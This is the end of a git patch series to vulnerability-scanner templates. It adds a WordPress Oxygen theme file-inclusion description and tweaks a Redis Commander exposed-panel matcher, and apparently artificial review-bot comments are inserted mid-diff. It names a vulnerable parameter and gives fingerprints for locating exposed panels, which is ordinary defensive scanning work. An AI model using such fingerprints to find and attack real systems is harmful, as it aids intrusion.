 reference: https://www.exploit-db.com/exploits/49986
 tags: solarlog,auth-bypass
From 058d859cd849f2047d5df2f2201b1007213bec66 Mon Sep 17 00:00:00 2001
From: Noam Rathaus <noamr@beyondsecurity.com>
Date: Tue, 26 Oct 2021 12:45:23 +0300
Subject: [PATCH 22/23] Add description
---
 vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
index 63829a085e..e4cb6515af 100644
--- a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
@@ -4,6 +4,7 @@ info:
 name: WordPress Oxygen-Theme Themes LFI
 author: 0x_Akoko
 severity: high
+ description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter.
 tags: wordpress,wp-theme,lfi
 reference: https://cxsecurity.com/issue/WLB-2019030178
From e453bfcb192a6d6fe15aea85b1b2fd38dbf5ed32 Mon Sep 17 00:00:00 2001
From: Sandeep Singh <sandeep@projectdiscovery.io>
Date: Tue, 26 Oct 2021 15:17:36 +0530
Subject: [PATCH 23/23] Update redis-commander-exposure.yaml
---
 exposed-panels/redis-commander-exposure.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/exposed-panels/redis-commander-exposure.yaml b/exposed-panels/redis-commander-exposure.yaml
index fea8a67df6..0a0ee65364 100644
--- a/exposed-panels/redis-commander-exposure.yaml
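Review bot: The repaired solar-log description still drops the "to" the truncated original lost and has no terminating period, so the fix is incomplete: `...which allows arbitrary remote attackers to gain administrative privileges by connecting to the server.` The wp-oxygen-theme-lfi description on the same line presents the script and the parameter as two separate locations ("in its 'download.php' and 'file' parameter"), when one is the field of the other: `description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in the 'file' parameter of its 'download.php' script.`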
+++ b/exposed-panels/redis-commander-exposure.yaml
@@ -7,7 +7,7 @@ info:
 reference:
 - https://joeferner.github.io/redis-commander/
 - https://github.com/joeferner/redis-commander
- tags: panel
+ tags: panel,redis
 requests:
 - method: GET
@@ -16,7 +16,7 @@ requests:
 matchers:
 - type: word
+ condition: and
 words:
 - "<title>Redis Commander"
 - "redisCommanderBearerToken"
- condition: and
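Review bot: Changing the first word to `"<title>Redis Commander"` is a reasonable way to stop matching pages that merely mention the product, but a `word` matcher is a literal substring check, so a title tag carrying attributes or a line break before the text would no longer match; if that shows up on real installations, a `- type: regex` matcher with `- '<title>\s*Redis Commander'` keeps the intent while tolerating the whitespace. Moving `condition: and` above `words:` is purely cosmetic. The matcher belongs to the request block that starts outside this hunk.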